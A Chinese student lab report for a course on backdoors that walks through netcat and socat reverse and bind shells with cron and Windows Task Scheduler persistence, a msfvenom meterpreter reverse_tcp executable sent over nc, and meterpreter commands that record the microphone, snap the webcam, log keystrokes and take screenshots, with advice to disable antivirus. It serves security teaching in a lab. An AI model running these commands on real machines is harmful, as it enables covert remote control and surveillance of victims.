Exp2-后门原理与实践

1.实验内容 (4分+2分附加题)

(1)使用netcat获取主机操作Shell,cron启动 (1分)
(2)使用socat获取主机操作Shell, 任务计划启动 (1分)
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (1分)
(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(2分)加分内容一并写入本实验报告。

2.实验环境

环境:

主机:Windows 10;
靶机:Kali Linux Debian 10;
在主机上用ipconfig查看Windows10主机IP

在Kali虚拟机中用sudo ifconfig查看Kali虚拟机IP

2.实验过程

一、使用netcat获取主机操作Shell,启动cron
在主机中使用ncat -l -p 1326(个人学号后四位)监听本机的1326端口

在主机中获取虚拟机shell

在虚拟机中使用nc 192.168.43.249(主机IP) 1326 -e /bin/sh连接主机反弹shell

成功getshell

在虚拟机中获取主机shell

在虚拟机中用nc -l -p 1326监听主机1326端口

在虚拟机中启动cron并在主机监听

先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)

在最后一行添加13 * * * * nc 192.168.211.1 1218 -e /bin/sh,即在每个小时的第18分钟反向连接Windows主机的1218端口

此外,也可以开一个非反弹式后门,在cron中写入nc -l -p 1218 -e /bin/sh,这是攻击机能随时通过nc 主机ip 1218获得虚拟机的一个Shell

二、使用socat获取主机操作Shell,任务计划启动

在Windows获得Linux Shell

在Kali中用'man socat'查看使用说明

在Windows中按'Win+R',再输入'compmgmt.msc'打开计算机管理

在系统工具中的任务计划程序中创建任务

设置任务名称

新建触发器


下一步是新建操作,但在新建操作前,我们需要在Windows上下载socat.rar,并解压后使用,使用参考文件夹里的'README'文件

新建操作,操作设置为启动程序'socat.exe',并添加参数'tcp-listen:1326 exec:cmd.exe,pty,stderr',这个命令的作用是把'cmd.exe'绑定到端口'1326',同时把'cmd.exe'的'stderr'重定向


设置好后我们按下'Win+L'(通用)或者'F10'(一些电脑适用)锁定工作台,即把电脑锁屏。解锁后由于Windows防火墙没关,发现弹出UAC警告,说明之前设置成功

在Kali中输入命令'socat - tcp:192.168.1.105:1326'

成功获取Windows的Shell

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Kali上生成后门可执行程序20191326_backdoor.exe
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.134 LPORT=1326 -f exe > 20191326_backdoor.exe,其中

  • LHOST为反弹回连的IP,在这里是要反弹给Kali,也就是Kali的IP
  • LPORT是回连的端口
  • -p 使用的payload。
  • payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
  • -f 生成文件的类型
  • > 输出到哪个文件

    在Windows上打开监听

    在Kali上用nc 192.168.101.77(本机ip) 1326 < 20191326_backdoor.exe将生成的20191326_backdoor.exe后门程序传过去


    在kali上使用msfconsole指令进入msf控制台

    对msf控制台进行配置
    依次输入以下命令:
use exploit/multi/handler		#使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp		#使用和生成后门程序时相同的payload
set LHOST 192.168.174.141			#KaliIP,和生成后门程序时指定的IP相同
set LPORT 1326


配置完后的情况

接着输入exploit进行监听,在Windows在打开20191326_backdoor.exe后成功获取到Windows的shell(注意最好把所有杀毒软件退出,否则打开后门程序时很容易出现拒绝访问的情况)

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

获取目标主机音频

在之前进入的MSF exploit中输入record_mic指令进行录音(-d可设置时长)

获取目标主机摄像头

输入webcam_snap指令控制摄像头进行拍照
run webcam可以进行屏幕录制,相当于不间断地用摄像头拍照片,并不断存储在一个jpg中,在文件系统中我们会看到一个在不断变化的jpg文件

输入keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录(-d可设置时长)

截取主机屏幕

使用screenshot指令可以进行截屏

posted @ 2022-04-02 21:00  叶家星  阅读(61)  评论(0编辑  收藏  举报